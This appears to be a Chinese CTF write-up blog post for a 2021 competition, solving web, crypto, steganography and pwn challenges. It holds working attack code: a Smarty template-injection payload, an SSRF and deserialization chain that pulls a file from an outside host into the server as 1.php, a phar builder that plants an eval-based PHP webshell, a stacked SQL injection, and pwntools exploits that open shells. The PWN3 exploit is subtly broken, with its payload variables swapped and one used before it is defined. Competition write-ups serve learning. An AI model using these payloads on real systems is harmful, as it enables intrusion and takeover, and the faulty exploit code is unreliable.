WEB
GET
smarty模板注入
?name={if passthru ('nl fl*')}{/if}
WEBSITE
8080反序列化+ssrf
payload:
<?php system(“ls /”);system(“ls ../”);system(“cat ../flag_WebSite_SsRf.txt”);
<?php
class copy_file{
public $path='upload/';
public $file='1.php';
public $url='http://127.0.0.1@xxx.xxx.xxx.xxx:xxxx/1.txt';
}
$a = new copy_file();
echo serialize($a);
http://example.com@127.0.0.1:8080/?data=O:9:"copy_file":3:{s:4:"path";s:7:"upload/";s:4:"file";s:5:"1.php";s:3:"url";s:41:"http://127.0.0.1@xxx.xxx.xxx.xxx:xxxx/1.txt";}
随后访问
http://127.0.0.1:8080/upload/1.php即可
file manager
一般路过phar伪协议
文件上传测试只能传图片,删除文件unlink可触发phar,同时code.html给了类
生成phar即可
<?php
class game
{
public $file_name='shell.php';
public $content = "<?=eval(\$_POST['cmd']);?>";
}
$a = new game();
$phar = new Phar('test.phar',0,'test.phar');
$phar -> startBuffering();
$phar -> setStub("<?php __HALT_COMPILER();?>");
$phar -> setMetadata($a);
$phar -> addFromString("test.txt","test");
$phar -> stopBuffering()
删除文件处删除框填phar://./sandbox/a.png即可触发
StAck3d 1nj3c
老偷题了, [SUCTF 2019]EasySQL,告辞
select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
隐写
在屋子上的小姐姐
好看照片,binwalk提,提示说是八位数字,结合右下角庚子年和June 6,猜测就是
20200606
![图片[1]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-19.png)
安卓
android1
hxd直接搜flag
加密码解密
凯撒大帝三步套娃
base64 , base32 , hex , 凯撒 , md5
依次解密
抚琴的RSA
#coding=utf-8
import gmpy2
p = 28805791771260259486856902729020438686670354441296247148207862836064657849735343618207098163901787287368569768472521344635567334299356760080507454640207003
q = 15991846970993213322072626901560749932686325766403404864023341810735319249066370916090640926219079368845510444031400322229147771682961132420481897362843199
e=354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
n = p*q
c = 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192
phi = (p -1) * (q - 1)
d= int(gmpy2.invert(e,phi))
m=pow(c,d,n)
print(m)
另类RSA
rsatools即可
杂项
Here are three packages!
开局里面给个意义不明的
不知道是啥,直接跑爆破,获得密码:
956931011
获得第二个包,同样意义不明
![图片[2]-四叶草牛年CTF-Write up-魔法少女雪殇](https://uploader.shimo.im/f/cjSRcMEEadL3ROTO.png!thumbnail)
反复测试得知是字数统计排序,撰写脚本
dic=dict()
d={}
s=set()
s='fk{hbeawfikn .l;jsg[op{ewhtgfkjbarASPUJF923U5 RJO9key3Y2905-RYHWEIOT{YU2390IETGHBF{}FUJse{ikogh{bwieukeyyjvgb"akkeysyh{k;yhweaukyeyoitgbsdakey{jg89gS}OYHqw8{}9ifgbDFHIOGHJ{fbiosGFBJKSgbfuiyoEGJWEbfv}yek'
d=dict()
for x in s:
if x not in d.keys():
d[x]=1
else:
d[x]=d[x]+1
#print(d)
print(sorted(d.items(), key = lambda i:i[1],reverse=True))
![图片[3]-四叶草牛年CTF-Write up-魔法少女雪殇](https://uploader.shimo.im/f/ztNnj1JRPuZE6ObC.png!thumbnail)
反复测试进行再次排序,次数都为4的不要,即可获得
key{bgfi9JaFHhosw}
解密获得包3
tip3.txt测试为零宽隐写,然还white脑测是snow,
![图片[4]-四叶草牛年CTF-Write up-魔法少女雪殇](https://uploader.shimo.im/f/vBoajnaYGphRUIG8.png!thumbnail)
![图片[5]-四叶草牛年CTF-Write up-魔法少女雪殇](https://uploader.shimo.im/f/9fQFTI8MZebFSE4E.png!thumbnail)
LSP们冲啊
经典crc碰撞
import datetime
import binascii
import string
def crack(crc_in):
crcs = set([crc_in])
r = string.printable
for a in r:
for b in r:
for c in r:
txt = a+b+c
crc = binascii.crc32(txt)
if (crc & 0xFFFFFFFF) in crcs:
return txt
print crack(0xd878a99d)
#0x07D3F356,0xd878a99d,0x4E25A843,0x6E16E99D,0x549248B9
获得密码:Zz!9(18Hb9e#>h8
png进行lsb隐写即可
![图片[6]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-20.png)
牛气冲天
伪加密cattle.jpg以及zip,
steghide解,脑洞密码就是文件名,
获得密码,awd@$..120LP
解压zip,获得png,
改高度
![图片[7]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-21.png)
PWN
PWN1
![图片[8]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-22.png)
连接后给提示直接返回地址就行了
from pwn import *
context.log_level = 'debug'
r = remote('127.0.0.1',10000)
payload = 'a'*0x48 + 'b'*4 + p32(0x804856d) + p32(0)
r.send(payload)
r.interactive()
PWN2
![图片[9]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-23.png)
开启canary保护
![图片[10]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-24.png)
![图片[11]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-25.png)
从&BUF读取0x30个数据,也是我们输入的,应该就是写shellcode进行执行,由于未开启pie保护,直接改printf中的值为buf地址即可
![图片[12]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-26.png)
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p = remote('127.0.0.1', 10001)
elf = ELF('./pwn2')
pd=p64(0x601080)
p.recv()
p.sendline(asm(shellcraft.sh()))
p.recvuntil('hzwz?\n')
p.sendline(str(elf.got['puts']))
p.recvuntil('know: ')
p.sendline(pd)
p.interactive()
PWN3
![图片[13]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-27.png)
开启nx保护
![图片[14]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-28.png)
程序中存在strtoll函数,首先输入16禁止然还会被在13行再次格式化,这里通过ropper找一下gadgets来构筑rop,最后栈溢出来getshell
ropper –file ./pwn3 –search “pop|ret” | grep rdi
![图片[15]-四叶草牛年CTF-Write up-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-29.png)
获得地址,撰写exp
exp:
from pwn import *
context.log_level = 'debug'
p=process('./pwn3')
p=remote("129.226.4.186",10002)
elf=ELF('./pwn3')
libc=elf.libc
#ELF("/lib/x86_64-linux-gnu/libc.so.6 ")
p.recvuntil("plz input something: ")
payload="601018"
p.sendline(pd)
p.recvuntil("something: ")
puts_addr=int(p.recv(15),10)
libc_base = puts_addr -libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base +next(libc.search("/bin/sh"))
p.recvuntil("Show me your code: ")
pd="a"*0x30+p64(0xdeadbeef)+p64(0x400803)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()
暂无评论内容